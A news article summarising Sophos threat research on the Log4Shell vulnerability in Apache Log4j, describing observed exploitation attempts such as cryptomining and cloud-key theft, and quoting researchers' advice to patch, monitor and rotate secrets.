About a week ago, there were news of a zero-day Log4Shell Java vulnerability, now formally denoted by CVE-2021-44228, which involves sending a request to a vulnerable server which includes some data – for example, an HTTP header – with the expectation that the server will write to its logfile.
According to Sophos, the primary cause of Log4Shell (or CVE-2021-44228 as indicated above), is what is called improper input validation. This means that you place too much trust in untrusted data that arrives from outsiders, and open up your software to sneaky tricks based on booby-trapped data.
Due to this, Log4Shell, a zero day vulnerability within Apache Log4j (a popular Java logging library) poses significant threats as it can be exploited for unauthenticated remote code execution. Remote execution code (or RCE), can allow any bad actor behind a computer to run code on a server. If not handled promptly and properly, hundreds of millions of machines will be vulnerable. The potential impact for this is huge.
In order to ensure that clients and the general public is made aware of and stays protected from the potential impacts of Log4Shell Java vulnerability, Sophos has provided new threat intelligence on how cyberattackers are already exploiting or attempting to exploit unpatched systems.
Already detailed in the SophosLabs Uncut article, Log4Shell Hell: Anatomy of an Exploit Outbreak (authored by Sean Gallagher, a senior threat researcher at Sophos), other highlights from the intelligence include:
- Sophos is seeing a rapid uptick in attacks exploiting or attempting to exploit this vulnerability, with hundreds of thousands of attempts detected so far
- Cryptomining botnets are among the earliest “attack” adopters; botnets focus on Linux server platforms, which are particularly exposed to this vulnerability
- Sophos has also seen attempts to extract information from services, including Amazon Web Services keys and other private data
- Sophos observed that attempts to exploit network services start by probing for different types. Around 90 percent of the probes Sophos detected were focused on the Lightweight Directory Access Protocol (LDAP.) A smaller number of probes targeted Java’s Remote Interface (RMI,) but Sophos researchers noted that there seem to be a larger variety of unique RMI-related attempts
- Sophos expects adversaries to intensify and diversify their attack methods and motivations in the coming days and weeks, including the possibility of leveraging for ransomware
According to Sean Gallagher, the senior threat researcher at Sophos, who wrote the SophosLabs Uncut article: “Since December 9, Sophos has detected hundreds of thousands of attempts to remotely execute code using the Log4Shell vulnerability. Initially, these were Proof-of-Concept (PoC) exploit tests by security researchers and potential attackers, among others, as well as many online scans for the vulnerability. This was quickly followed by attempts to install coin miners, including the Kinsing miner botnet. The most recent intelligence suggest attackers are trying to exploit the vulnerability to expose the keys used by Amazon Web Service accounts. There are also signs of attackers trying to exploit the vulnerability to install remote access tools in victim networks, possibly Cobalt Strike, a key tool in many ransomware attacks.
“The Log4Shell vulnerability presents a different kind of challenge for defenders. Many software vulnerabilities are limited to a specific product or platform, such as the ProxyLogon and ProxyShell vulnerabilities in Microsoft Exchange. Once defenders know what software is vulnerable, they can check for and patch it. However, Log4Shell is a library that is used by many products. It can therefore be present in the darkest corners of an organization’s infrastructure, for example any software developed in-house. Finding all systems that are vulnerable because of Log4Shell should be a priority for IT security.
“Sophos expects the speed with which attackers are harnessing and using the vulnerability will only intensify and diversify over the coming days and weeks. Once an attacker has secured access to a network, then any infection can follow. Therefore, alongside the software update already released by Apache in Log4j 2.15.0, IT security teams need to do a thorough review of activity on the network to spot and remove any traces of intruders, even if it just looks like nuisance commodity malware.”
Gallagher further urged users to stay vigilant and not drop their guard in as far as the Log4Shell vulnerability is concerned,
“With the exception of cryptomining, there is a lull before the storm in terms of more nefarious activity from the Log4Shell vulnerability. We expect adversaries are likely grabbing as much access to whatever they can get right now with the view to monetize and/or capitalize on it later on. The most immediate priority for defenders is to reduce exposure by patching and mitigating all corners of their infrastructure and investigate exposed and potentially compromised systems. This vulnerability can be everywhere,” he cautioned.
Where systems have been identified as vulnerable, he advised that defenders should run an incident response process and monitor for signs of remote access trojans such as C2 call-backs. “Secrets stored on exposed systems should also be rotated, particularly if they are exposed in environment variables. Lastly, consider critical third party vendors who may also be at risk.” says Sean Gallagher, Senior Threat Researcher, Sophos,” he added.
Paul Ducklin, the principal research scientist at Sophos, adds that various technologies are already at work to help bring the global vulnerability under control.
Stated Ducklin: “Technologies including IPS, WAF and intelligent network filtering are all helping to bring this global vulnerability under control. But the staggering number of different ways that the Log4Shell ‘trigger text’ can be encoded, the huge number of different places in your network traffic that these strings can appear, and the wide variety of servers and services that could be affected are collectively conspiring against all of us. The very best response is perfectly clear: patch or mitigate your own systems right now. Our article provides practical advice that explains how the vulnerability works, why it works, what it can do, and how to fix it.”